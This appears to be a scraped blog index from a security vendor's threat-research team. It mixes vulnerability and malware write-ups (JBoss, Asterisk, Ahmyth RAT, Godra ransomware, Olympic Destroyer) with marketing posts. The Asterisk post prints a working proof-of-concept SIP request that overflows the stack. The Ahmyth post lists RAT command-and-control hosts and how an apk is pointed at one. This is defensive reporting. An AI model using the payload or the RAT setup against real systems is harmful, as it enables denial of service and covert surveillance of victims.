Red Hat JBoss Data Grid Insecure Deserialization Vulnerability

/in /by

Red Hat JBoss Data Grid is an in-memory datastore solution. The client application of this software has integrated the Infinispan Hot Rod client library.

A deserialization vulnerability exists in the Red Hat JBoss Data Grid. As the Hot Rod client library failed to add proper filtering before deserializing an arbitrary class, an arbitrary object could be serialized by this library. An attacker could inject a malicious serialized object via the cache, and execute arbitrary code with the privilege of the client application.

Object serialization is a feature supported by Java, which allows an object to be loaded via a binary stream, making them portable. This feature also causes security risks as hackers may load malicious object via a controllable object in deserialization. A common practice is enabling a whitelist before the application retrieve the object.

In the Hot Rod client library, however, in the version 7.1.0, the code lacks of necessary whitelisting of the object class. And in 7.1.1, the filtering could still be bypassed by using the River Marshalling Protocol:

In class org.infinispan.client.hotrod.marshall.MarshallerUtil:

In class org.infinispan.commons.marshall.jboss.AbstractJBossMarshaller:

The patch 7.1.2 for Red Hat JBoss Data Grid version is already available here. Also SonicWall Capture Labs Threat Research team has developed the following signature to identify and stop the attacks:

  • IPS 13248: Red Hat JBoss Data Grid Insecure Deserialization

Reference:

  1. Infinispan open sourced library : http://grepcode.com/file/repo1.maven.org/maven2/org.infinispan/infinispan-client-hotrod/
  1. Red Hat JBoss Data Grid 7.1.2 security update : https://dl.packetstormsecurity.net/1802-advisories/RHSA-2018-0294-01.txt

Trojanized Android Ahmyth RAT spreads via legitimate apps

/in /by

SonicWall Capture Labs Threats Research team observed an Android Remote Administration Tool (RAT) named Ahmyth which is being trojanized into other Android apps and is getting distributed in the wild. Upon infecting an Android device this RAT can send sensitive information present on the device like SMS and call logs as well as perform functions like taking a picture, sending a text message or record audio via the microphone.

After obtaining a couple of malicious RAT samples we investigated further revealing the origins of this RAT. We found a Github repository that hosts the code for this RAT – https://github.com/AhMyth.

This RAT was released in 2017 and supports multiple Operating Systems:

The author claims that this was developed for educational purposes (as highlighted on Github) but clearly someone is spreading this RAT for their own malicious motives, more on that later.

Inside Ahmyth

This RAT contains two components:

  • Client side component – which runs on the victim’s Android device
  • Server side component – this runs on the computer which is used to monitor the victim and send commands to the infected device

Upon installing and running the server component we see the opening screen which shows a list of victims, currently in the image below there are none since we haven’t infected any victims yet.

In-order to report back to the server we add the server’s IP address in the source, once done we can build an apk which will report back to our machine:

Now the apk is ready to infect a device and report back to the server. Upon installing on a device the apk reports back to the server and we can see the victim’s entry on the dashboard:

The attacker can now command the RAT to perform a number of functions, few of them are highlighted below:

  • View Call logs
  • View and send SMS
  • View contacts
  • View GPS location of the device
  • View files on the device

We obtained samples with different source location, this is the address where the apk will report back to:

  • oleg12221443242.zapto.org:2222
  • vivanesko2002.ddns.net:22708
  • tafelrubber.us.to:6220

Spreading Ahmyth further

Malicious apk’s spread mainly via the following two routes:

  • As text message with a link to install the malicious apk
  • Email message containing a link to install the app

Additionally an attacker can spread this RAT via the Ahmyth control server by:

  • Sending a text message from the infected device to one of the victims contacts. For the new target it would appear as a text message from someone he knows, thereby there is a higher chance that he will trust this message

Another way to spread is this RAT is to trojanize it into something benign. Malware writers have already started combining Ahmyth with other clean Android apk’s, we identified a few of them:

  • Minecraft -com.mojang.minecraftpe
  • YouTube Downloader -dentex.youtube.downloader

Below is a comparison of the code structure found in the original Ahmyth client apk and a few trojanized samples in the wild:

Overall this looks like another case where a publicly available tool has been used for personal reasons with a malicious intent. We can expect more trojanized Android samples with a hidden Ahmyth RAT in the near future.


Sonicwall Capture Labs provides protection against this threat with the following signatures:

  • GAV: AndroidOS.AhRat.INFSTLR (Trojan)
  • GAV: AndroidOS.AhRat.INFSTLR_2 (Trojan)
  • GAV: AndroidOS.AhRat.INFSTLR_3 (Trojan)


Basic details about the samples analyzed:

    • Package name: ahmyth.mine.king.ahmyth
    • MD5: 8a630c3f3d441f012778efac3d154b90

 

    • Package name: com.mojang.minecraftpe
    • MD5: c552f2565df8b793fa68870309489b72

 

    • Package name: dentex.youtube.downloader
    • MD5: c1f5e9e560388d5aeedc71628967e119

 

  • Package name: com.apkhere.flashlight
  • MD5: 2b648af46eb081d896768a9b3413e3b4

 

2018 SonicWall Cyber Threat Report: Actionable Intelligence for the Cyber Arms Race

/0 Comments/in /by

Make no mistake, we are in a global cyber arms race. But it can’t be won alone: we are in this together.

That is why SonicWall is passing along findings, intelligence, analysis and research from our SonicWall Capture Labs to you today in our 2018 SonicWall Cyber Threat Report. By sharing actionable intelligence, we can help level the playing field against today’s most malicious cyber criminals.

Together, we face many battlefronts: some subsiding, some ongoing, others still on the horizon. Our latest Cyber Threat Report shows us where we — and our common cyber enemies — have advanced. Plus, it offers strategic insight on how, together, we can keep the upper hand.

Security Industry Advances

Ransomware attacks are down
The Cyber Threat Report looks at why expectations of increased numbers of ransomware attacks never materialized in 2017, even with WannaCry, NotPetya and Bad Rabbit stealing the headlines. At the same time, however, data from our cloud-based, multi-engine Capture Advanced Threat Protection (ATP) sandbox noted a spike in unique ransomware variants. While the volume was lower, the attacks were more targeted, unique and difficult to stop.

SSL, TLS encryption are up
The report documents a rapid increase of HTTPS in comparison to unencrypted HTTP sessions, which is critical for the security of cloud environments/applications and websites. However, this shift has given more opportunity for cyber criminals to hide malicious payloads in encrypted sessions. Unfortunately, while effective protection exists using deep packet inspection (DPI), there is still a widespread fear of complexity and lack of awareness around the need to inspect SSL and TLS sessions to stop hidden cyber attacks.

Exploit kits are shifting targets
Since browser vendors have largely phased out Adobe Flash, new Flash Player exploits have dropped off. But the Cyber Threat Report reveals some unexpected applications that are taking its place. Organizations should continually redefine and broaden the scope of applications and related files that could present a risk. In analyzing application volume, machine-learning technology can help protect against newer attack vectors.

Law enforcement disrupting cyber crime
Arrests of key malware and exploit kit authors are making a significant dent in the scale, volume and success of cyber attacks. In response, cyber criminals are being more careful with how they conduct business. Our latest report considers shifting trends in payment methods — particularly bitcoin — as well as other forces driving shifting trends in ransomware.

Cyber Criminal Advances

Ransomware variants increase
Despite a plunge in ransomware payouts, and a significant drop in total volume of ransomware attacks year over year, SonicWall Capture Labs identified a new malware variant for every 250 unknown hits. These new variants proved to be fairly effective when utilized. The Cyber Threat Report examines whether 2017 was an outlier, or if 2018 will signify a true shift in the threat landscape.

Encryption hiding cyber attacks
While encrypting traffic is a necessary practice, it can also cloak illegal or malicious traffic. For the first time ever, the 2018 SonicWall Cyber Threat Report offers real-world data from SonicWall Capture Labs that unmasks the volume of malware and other exploits hidden in encrypted sessions. These Capture Labs findings are our first empirical data available on SSL- and TLS-based attacks.

Malware cocktails shaking things up
Cyber criminals are creating “malware cocktails” that mainly rely on preexisting code with a few minor variants. These can spread quickly and more dangerously, while avoiding detection. While no single exploit rose to the level of Angler or Neutrino in 2016, there were plenty of malware writers leveraging one another’s code and mixing them to form new malware, thus putting a strain on signature-only security controls. The Cyber Threat Report looks at trending exploit kits and how they have repurposed old code for new gains.

IoT, chips processors are emerging battlegrounds
Cyber criminals are pushing new attack techniques into advanced technology spaces, notably the Internet of Things (IoT) and chip processors. These potential vectors for cyber attack are grossly overlooked and unsecured.

The Cyber Threat Report explains how modern malware writers implement advanced techniques, including custom encryption, obfuscation and packing, as well as acting benign within sandbox environments, to allow malicious behavior to remain hidden in memory. These techniques often hide the most sophisticated weaponry, which is only exposed when run dynamically. In most cases, they’re impossible to analyze in real time using static detection techniques.

Inside the SonicWall Cyber Threat Report

You’ll find more detail on these advances by the security industry and cyber criminals in the latest 2018 SonicWall Cyber Threat Report. The report empowers you and your team with:

  • Proprietary empirical data that you will get nowhere else to help you confidently understand key cyber threat trends
  • Detailed predictions on trending threats and security solutions to help you plan and budget resources
  • Expert best practices and valuable resources to help successfully guide you forward

    Get the 2018 SonicWall Cyber Threat Report

    The cyber arms race is a challenge we face together. And it’s the core reason we’re committed to passing our findings, intelligence, analysis and research to the global public via the SonicWall 2018 Cyber Threat Report.

     

    get the report

SonicWall Recognized on CRN’s 2018 Security 100 List

/0 Comments/in /by

Today CRN, a brand of The Channel Company, has named SonicWall to its annual Security 100 list.

This project recognizes the coolest security vendors in each of five categories: Endpoint Security; Identity Management and Data Protection; Network Security; SIEM and Security Analytics; and Web, Email and Application Security. The companies on CRN’s Security 100 list have demonstrated creativity and innovation in product development as well as a strong commitment to delivering those offerings through a vibrant channel of solution providers.

In addition to recognizing security technology vendors for outstanding products and services, the Security 100 list serves as a valuable guide for solution providers trying to navigate the IT security market. The list aids prospective channel partners in identifying the vendors that can best help them improve or expand their security offerings.

“The core elements of today’s businesses, both large and small, depend upon robust and reliable cybersecurity solutions,” said Bob Skelley, CEO of The Channel Company. “Unprecedented streams of data, the sweeping transition to cloud computing, vast networks of wireless systems, the rapidly growing Internet of Things—all these advances necessitate increasingly complex and adaptive security measures. CRN’s 2018 Security 100 list recognizes top vendors that are meeting this extraordinary demand with the most innovative security technologies on the market, enabling businesses to grow uninterrupted.”

This announcement comes just 24 hours ahead of the launch of the 2018 SonicWall Cyber Threat Report. This premier cyber security industry report puts you a step ahead of cyber criminals in the global cyber war, empowering you with proprietary security data, global knowledge and latest trends, gathered and analyzed by our leading-edge SonicWall Capture Labs Threat Network. The 2018 Cyber Threat Report is available on March 6.

The Security 100 list will be featured in the April 2018 issue of CRN and online at www.crn.com/security100.

Godra Ransomware demands 200,000 Euros for decryption

/in /by

The Sonicwall Capture Labs Threats Research team have come across Bosnian ransomware pretending to be from the Croatian Financial Agency (FINA). It is reported to arrive in the form of an email and demands an astronomical 200,000 Euros in bitcoin for decryption.

Infection cycle:

The Trojan uses the following icon:

The Trojan drops the following files onto the system:

  • %APPDATA%\Prijedlog_za_ovrhu_urbr_220-2017.pdf
  • KAKO OTKLJUČATI VA�E DATOTEKE.log (in every folder containing encrypted files)

Prijedlog_za_ovrhu_urbr_220-2017.pdf is a text file and contains the following text:

1519925249

This text is a timestamp. The file is used as a mutex to prevent double infection.

KAKO OTKLJUČATI VA�E DATOTEKE.log contains the following text:

The text is in Bosnian. We translated it to english using google translate:

YOUR PERSONAL FILES ARE CREATED !!!WARNING!DO NOT TEST DECEPTATE YOUR FILES ONLY. EVERY MODIFICATION OF DECEPTED FILES MAKE SUCCESSFUL MUCH! ONE WAY TO DETERMINE YOUR FILES IS IMPORTANT TO COMPLETE INSTRUCTIONS !!!What happened to my computer?All your essential files are encrypted.All your documents, photos, video materials, databases and other files are no longer available because they are encrypted. Do not poke and waste time decrypting or restoring your files because no one can decrypt your files without our decryption service.Can I restore my files?Of course. WE GUARANTEE the return of your files after payment:2.000,00 EUR (two hundred thousand) in BTC (BitCoin) equivalentYou have 48 hours to send a payment, otherwise the price is doubled. Also, if you do not make a payment after another 72 hours, your files will be lost irretrievably. After the payment has been made, please send us the “User ID” and the wallet number from which the payment was made to godra@protonmail.chUser ID: 1519657128After that, we will send you decryption software that will restore your files. Please note that * NOT IN WHAT MODE * you do not modify your encrypted files because the return will NOT be possible.You can send us a file at godra@protonmail.ch (up to 100kB) in order to prove to you that decryption is possible.HOW TO PAY?We only accept payments in BTC (BitCoin) currency. The payment must be made to the following address:13srq1SP93mEs7asR2UxWBUts3x9oUcuacDo not use “deep web” wallets such as Tor Wallet, Onion Wallet, Shadow Wallet, Hidden Wallet and the like.Buy BTC (BitCoin) only from the official BitCoin Exchange!Official exchange rate and prices: https://howtobuybitcoins.info/Shopping recommendations: https://bit4coin.net/ or https://www.coinbase.com/ or https://xcoins.io/Bit4Net does not need registration! You can buy BitCoin via PayPal at Xcoins.io!E-mail address for communication: godra@protonmail.chSend us an e-mail with your “User ID” and the wallet from which the payment was made!WARNING!DO NOT TEST DECEPTATE YOUR FILES ONLY. EVERY MODIFICATION OF DECEPTED FILES MAKE SUCCESSFUL MUCH! ONE WAY TO DETERMINE YOUR FILES IS IMPORTANT TO COMPLETE INSTRUCTIONS !!!We reached out to godra@protonmail.ch via email but received no response.

The Trojan attempts to contact fina.online but at the time of writing the page appears to have been cleaned up:

Upon debugging the executable, the Trojan is seen iterating through files on the system, encrypting those files and appending “godra” to their names after encryption:

The Trojan uses its own proprietary encryption routine. We were able to locate the encryption algorithm and key. This can potentially be used to restore files:

SonicWALL Gateway AntiVirus provides protection against this threat via the following signatures:

  • GAV: Godra.RSM (Trojan)

 

Sneak Peek: 2018 SonicWall Cyber Threat Report

/0 Comments/in /by

The cyber security industry relies on perpetual cadence of collaboration, research, analysis and review.

For SonicWall, that comes via our in-depth cyber threat report. This year, we’re excited to announce that we will publish the 2018 SonicWall Cyber Threat Report on Tuesday, March 6.

This premier cyber security industry report puts you a step ahead of cyber criminals in the global cyber war, empowering you with proprietary security data, global knowledge and latest trends, gathered and analyzed by our leading-edge SonicWall Capture Labs Threat Network.

Reimagined and refreshed, the 2018 SonicWall Cyber Threat Report is more comprehensive, informative and actionable than ever before with:

  • A comprehensive comparison of security industry advances versus cybercriminal advances year-over-year, to help you know where you stand
  • Proprietary empirical data that you will get nowhere else, to help you confidently understand key threat trends
  • Detailed predictions on trending threats and security solutions, to help you plan and budget resources
  • Expert best practices and valuable resources, to help successfully guide you forward

Here is a sneak preview

The modern cyber war — against governments, businesses and users alike — is comprised of a series of attacks, counterattacks and respective defensive countermeasures. Many are simple and effective. Others are targeted and complex. Yet they are all highly dynamic and require persistence, commitment and resources to mitigate.

Unfortunately, organizations large and small are caught in the middle of a global cyber arms race with vastly different resources at their disposal. And while growing budgets do make a positive impact on the effectiveness against known exploits, the threat landscape evolves at such a rate that yesterday’s investment in technology could already be insufficient to deal with tomorrow’s cyber threats.

No one has immunity.

Headline breaches

2017 was another record year for data breaches. The 2018 SonicWall Cyber Threat Report breaks these down by the numbers.

Ransomware

With WannaCry, Petya and Bad Rabbit all becoming headline news, ransomware was a hot topic for the second year in a row. The 2018 SonicWall Cyber Threat Report reveals a key indicator of how attack strategies are shifting.

Memory attacks

While the Meltdown and Spectre vulnerabilities were first publicly known in early 2018, the processor vulnerabilities were actually exposed last year. In fact, Intel notified Chinese technology companies of the vulnerability before alerting the U.S. government.

Threat actors and cybercriminals are already leveraging memory as an attack vector. Since these memory-based attacks are using proprietary encryption methods that can’t be decrypted, organizations must quickly detect, capture and track these attacks once they’re exposed in memory — usually in under 100 nanoseconds. Chip-based attacks will be at the forefront of the cyber arms race for some time to come.

IoT

The Internet of Things (IoT) also had a big year. The 2018 SonicWall Cyber Threat Report examines last year’s trends to predict what will be in the crosshairs next.

Business risk

Data breaches and cyber attacks are no longer back-of-mind concerns. The 2018 SonicWall Cyber Threat Report explains why they are the No. 1 risk to business, brand, operations and financials.

The battle within encrypted traffic

For the first time ever, the 2018 SonicWall Cyber Threat Report will provide key empirical data on the volume of attacks leveraging SSL/TLS encryption.

Want the report first?

The cyber arms race is a challenge we face together. And it’s the core reason we’re committed to passing our findings, intelligence, analysis and research to the global public via the SonicWall 2018 Cyber Threat Report.

GET IT FIRST

About the SonicWall Capture Labs Threat Network

Data for the 2018 SonicWall Annual Threat Report was gathered by the SonicWall Capture Labs Threat Network, which sources information from global devices and resources including:

  • More than 1 million security sensors in more than 150 countries and territories
  • Cross‐vector, threat‐related information shared among SonicWall security systems, including firewalls, email security, endpoint security, honeypots, content-filtering systems and the SonicWall Capture Advanced Threat Protection multi‐engine sandbox
  • SonicWall internal malware analysis automation framework
  • Malware and IP reputation data from tens of thousands of firewalls and email security devices around the globe
  • Shared threat intelligence from more than 50 industry collaboration groups and research organizations
  • Intelligence from freelance security researchers

The full 2018 SonicWall Cyber Threat Report will feature detailed threat findings, best practices, predictions and more, to help you stay a step ahead in the global cyber war.

Asterisk SUBSCRIBE Request Buffer Overflow Vulnerability

/in /by

Asterisk is a software implementation of a telephone private branch exchange (PBX). It allows telephones interfaced with a variety of hardware technologies to make calls to one another, and to connect to telephony services, such as the public switched telephone network (PSTN) and voice over Internet Protocol (VoIP) services.

A memory corruption vulnerability has been reported on Asterisk. Due to improper handling of the SUBSCRIPBE request in the Session Initiation Protocol (SIP) implementation, a buffer overflow vulnerability can be triggered inside the service process memory space, An attacker could send a certain crafted SUBSCRIBE request, and cause Denial-of-Service or even remote code execution on the target server with the privilege of the service process.

SIP is a request-response based application layer protocol. The memory corruption vulnerability is triggered when the Asterisk SIP service parsing the SUBSCRIBE request’s header. During this process, a sequence of C functions will be called:

pubsub_on_rx_subscribe_request(): Request handling
subscription_get_generator_from_rdata(): Construct the request object in memory

There is a kind of header for the SIP protocol called “Accept”, which could appear in multiple entries inside the request header. When the function subscription_get_generator_from_rdata() handling a group of “Accept” request header, it will allocate a array in the memory for the contents. And the size of the array depends on a value num_accept_headers. However, this value comes from user-input, and was trusted unconditionally, causing an arbitrary write vulnerability inside the Asterisk service’s memory space.

An Proof-of-Concept code has already been published on Github [1]:

 SUBSCRIBE sip:3000@127.0.0.1:5060 SIP/2.0 To:  From: Test  Call-ID: 1627b84b-b57d-4256-a748-30d01d242199 CSeq: 2 SUBSCRIBE Via: SIP/2.0/TCP 172.17.0.1:10394;branch=z9hG4bK1627b84b-b57d-4256-a748-30d01d242199 Contact:  Accept: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA Accept: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA Accept: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA (REPEAT ACCEPT FOR 50 TIMES) Event: message-summary Allow: Allow: SUBSCRIBE, NOTIFY, INVITE, ACK, CANCEL, BYE, REFER, INFO, OPTIONS, MESSAGE Authorization: Digest username="3000",realm="asterisk",nonce="1517181436/80170188d05f4af45b8530366c8e7e5e",uri="sip:127.0.0.1:5060",response="a4a88b777731349899227dc3170efdcf",algorithm=md5 Content-Length: 0

It assigned the Accept header with 100 ‘A’s. And such request will smash the stack with 0x41, overwrites critical pointers and causing a crash on the the service process. 

 *** stack smashing detected ***: /opt/asterisk/sbin/asterisk terminated  Thread 25 "asterisk" received signal SIGABRT, Aborted. [Switching to Thread 0x7ffff0481700 (LWP 129)] 0x00007ffff5101428 in __GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:54 54	../sysdeps/unix/sysv/linux/raise.c: No such file or directory. (gdb) bt #0  0x00007ffff5101428 in __GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:54 #1  0x00007ffff510302a in __GI_abort () at abort.c:89 #2  0x00007ffff51437ea in __libc_message (do_abort=do_abort@entry=1, fmt=fmt@entry=0x7ffff525b49f "*** %s ***: %s terminatedn") at ../sysdeps/posix/libc_fatal.c:175 #3  0x00007ffff51e515c in __GI___fortify_fail (msg=, msg@entry=0x7ffff525b481 "stack smashing detected") at fortify_fail.c:37 #4  0x00007ffff51e5100 in __stack_chk_fail () at stack_chk_fail.c:28 #5  0x00007ffff1613be2 in subscription_get_generator_from_rdata (handler=, handler=, rdata=) at res_pjsip_pubsub.c:755 #6  0x4141414141414141 in ?? () #7  0x4141414141414141 in ?? () #8  0x4141414141414141 in ?? () #9  0x4141414141414141 in ?? () #10 0x4141414141414141 in ?? () #11 0x4141414141414141 in ?? () #12 0x0041414141414141 in ?? () #13 0x4141414141414141 in ?? () ....

SonicWall Capture Labs Threat Research team has developed the following signature to identify and stop the attacks:

  • IPS 13238: Asterisk SUBSCRIBE Request Buffer Overflow

Reference:

SonicWall CEO Bill Conner Joins Cyber Security Panel on Capitol Hill

/0 Comments/in /by

Cybercrime is a lucrative and booming industry, with recent reports estimating $600 billion in damages to businesses. With the introduction of innovative cyber security technologies and new cyber attack variants, the race is on for private and public organizations to arm themselves for a battle that is being waged in a dynamic threat landscape.

Bill Conner Portrait

On March 6, cyber security experts and policymakers will come together in a panel discussion to address the current threat landscape and its impact on the U.S. economy. Featuring Congressman Lamar Smith, SonicWall CEO Bill Conner and the Honorable Secretary Michael Chertoff, the panel will foster dialogues that focus on the preventative measures organizations should take to thwart cyber attacks, as well as the joint efforts of government and law enforcement agencies combatting modern-day cyber attacks, cybercriminals and threat actors.

Preceding the event, Conner and Chertoff penned an opinion piece, “SEC, Congress take steps toward cyber accountability and transparency,” on The Hill.

Michael Chertoff Portrait

“Cyber risk affects virtually every kind of enterprise. It is not a matter of if, but when,” they wrote on The Hill. “Companies should start with the presumption that they will be attacked and have a comprehensive incident response plan in place. An incident response plan should include a consumer notification process especially when sensitive data such as Social Security numbers and financial information is corrupted.”

Event: Cybersecurity Panel Discussion – 2018 SonicWall Cyber Threat Report
Date: Tuesday, March 6, 12:30 p.m. EST
Location: Committee Room 2325, Rayburn House Office Building, Washington D.C.
Panel:

  • Chairman Lamar Smith, Congressman, 21st Congressional District of Texas
  • Honorable Secretary Michael Chertoff, former head of the U.S. Department of Homeland Security
  • Bill Conner, President and CEO, SonicWall
  • Michael Crean, CEO, Solutions Granted

The panel also will leverage and discuss the findings and intelligence from the 2018 SonicWall Cyber Threat Report, which provides key advances for the security industry and cybercriminals; exclusive data on the 2017 threat landscape; cyber security predictions for 2018; cyber security guidelines and best practices.

Get the 2018 SonicWall Cyber Threat Report

The cyber arms race is a challenge we face together. And it’s the core reason we’re committed to passing our findings, intelligence, analysis and research to the global public via the SonicWall 2018 Cyber Threat Report.

Get the Report

SonicWall MSSP Program: Blueprint for Filling the Cyber Security Skills Gap

/0 Comments/in /by

The demand for experienced cyber security professionals is at an all-time high. These highly skilled assets are essential in helping businesses protect customers, networks, sensitive data and intellectual property in a fast-moving cyber arms race.

But according to a recent ESG study, 51 percent of respondents claimed their organization had a problematic shortage of cyber security skills. I have watched this deficiency consistently grow the last five years.

Organizations are struggling to understand their own risk, which threats to focus on and where to put more of their security, resources and people to protect their environment.

When deploying new software, systems and architecture to run their business, companies find themselves redefining their cyber security strategy. They become focused on combating the cyber criminals and threat actors attacking their vulnerable web applications, systems, networks and connected devices. And they lose focus on their core business.

Annual ESG surveys are identifying an alarming trend in the cyber security skills gap. More than 51 percent of respondents claimed their organization had a problematic shortage of cyber security skills. This figure has more than doubled since 2014, according to CSO Online.

They must procure, implement, manage and optimize numerous cyber security tools and solutions that are running on different platforms and providing data in various formats. Security manageability and accountability becomes an operational challenge.

The absence of coordination, central collection, normalization and analysis of disparate data often leads to an incomplete and incoherent view of what is happening in the organization. This lack of visibility and awareness inside the security environment further impairs an organization’s ability to identify and remediate security gaps.

The absence of an in-house security team often compels organizations to outsource their entire security program to a capable managed security service provider (MSSP). It is all about managing and reducing risks, and responding fast to security events. For a majority or companies, this is a smart approach.

Managed security services (MSS) come in many different flavors and degrees of complexity. In fact, according to Research and Markets, the global MSSP market is predicted to exceed $31 billion by 2019 and the escalating cyber arms race is a primary catalyst.

Thankfully, I already see that many SonicWall SecureFirst partners have implemented managed security solutions to fill the skills gap. Others are in the process of doing so.

SonicWall continues to be committed to enabling partners to grow their services practices, and it’s the core reason we’ve just rolled out the SecureFirst MSSP Partner Program.

The SonicWall SecureFirst MSSP Partner Program

We designed our MSSP Program with the flexibility to ensure SecureFirst Partners across the spectrum of MSSP maturity models could participate and gain significant value from participation in the program.

Available to SecureFirst Silver, Gold and Platinum Partners, the SecureFirst MSSP Partner Program includes options for monthly billing through SonicWall’s popular Security-as-a-Service pricing model, multi-tenant capabilities and go-to-market branding opportunities. The SecureFirst MSSP Program will help eligible partners:

  • Design, launch and scale their MSSP offerings
  • Defend customers against evolving threats
  • Grow deeper customer relationships that place partners in a position of trust and thought leadership
  • Increase profitability by offering recurring, consistent revenue streams
  • Help customers reduce or eliminate upfront product costs

A constant struggle for MSSPs today is managing their operating costs, which makes security solution selection critical in helping minimize man-hours responding to incidents. With SonicWall Capture Labs threat intelligence data, SonicWall empowers MSSP partners with the critical threat visibility to offer customers real value through automated, ongoing and proactive protection in today’s ever-evolving threat landscape.

The MSSP ‘blueprint’

Recognizing that time to revenue is critical, our MSSP program offers MSS blueprints to help Partners jumpstart their managed security service offerings quickly and cost effectively. These blueprints provide the training, tools and support required to deliver a range of managed service offerings based on SonicWall solutions they already trust.

The program helps SonicWall partners offer a range of managed security service offerings either by implementing SonicWall MSS blueprints for high-demand managed security solutions or by jointly developing custom MSS offerings that build on your existing managed service core competencies and expertise.

Jumpstarting MSSP offerings

I strongly believe that proactive MSSPs are agile, responsive and skilled. They have the mindset to deliver valuable security outcomes, which are more realistic and cost-effective than customers taking their cyber security efforts in-house.

Following the Partner Enabled Services program SonicWall launched in 2017, the SonicWall MSSP Partner program is focused on helping partners — of all MSS maturity stages — jumpstart their managed services offerings to quickly fill their customers’ cyber security skills gap.

One of our trusted partners told me, “More of our customers are looking toward end-to-end managed security services to protect themselves.”

It’s just one of the many candid pieces of feedback I receive when talking to our partners across the board. As a 100 percent channel company, I knew the SonicWall MSSP Partner program was the next step to support our loyal channel community.

Ready to Enroll in the SonicWall MSSP Program?

Eligible SecureFirst Partners may register for the SonicWall SecureFirst MSSP Program online at https://www.sonicwall.com/en-us/partners/mssp-partner-program. For additional information, please download our complimentary program brochure.

Olympic Destroyer malware targeted Pyeongchang Games

/in /by
  • Malware.exe
    • %Userprofile%\windows\AppData\Local\Temp\_ail.exe
    • %Userprofile%\windows\AppData\Local\Temp\_cqk.exe
    • %Userprofile%\windows\AppData\Local\Temp\_lew.exe
    • %Userprofile%\windows\AppData\Local\Temp\mbxve.exe
    • %Userprofile%\Public\19D132B60A21D68CFAC81B1BD252C965

Once the computer is compromised, the Malware runs the following commands:

The Malware overwrites the computer’s partition table to avoid targets to
recover their system drive, thereby making the infected machine unusable:

The malware deletes all shadow copies on the system using vssadmin tool:

The malware deletes all Web admin backup files on the target system:

The malware wipes all available logs of the System Security windows event log to ensure that recovery
is extremely difficult:

The Malware drops two VBS files on the target system and execute it via
VBScript tool:

The credentials embedded in the malware sample indicate that the Olympics
IT providers was likely compromised by the same hackers that ultimately hit
the Winter Olympics. It remains unclear how hackers were able to steal so
much information from Olympics employees, Here are some examples of
embedded credentials:

After this Malware runs the above commands its deletes itself using
injected shellcode in a legitimate copy of notepad.exe, the malware writes
shellcode in the allocated memory through WriteProcessMemory and it creates
a remote thread for its execution via CreateRemoteThread function. The
injected notpad.exe waits until the sample terminates, and then deletes it.

Sonicwall Capture Labs provides protection against this threat via the
following signature:

  • GAV: OlympicDestroyer.A (Trojan)

 

 

The SonicWall Capture Labs Threat Research Team observed new malware
Called OlympicDestroyer [OlympicDestroyer.A].The Winter Olympics this year is being held in Pyeongchang, South Korea and OlympicDestroyer malware was designed to knock computers
offline by deleting critical system files, which would render the machines
useless. This Malware was used in an attack on the opening ceremony of the
Pyeongchang Winter Games.Infection Cycle:The Malware adds the following files to the system: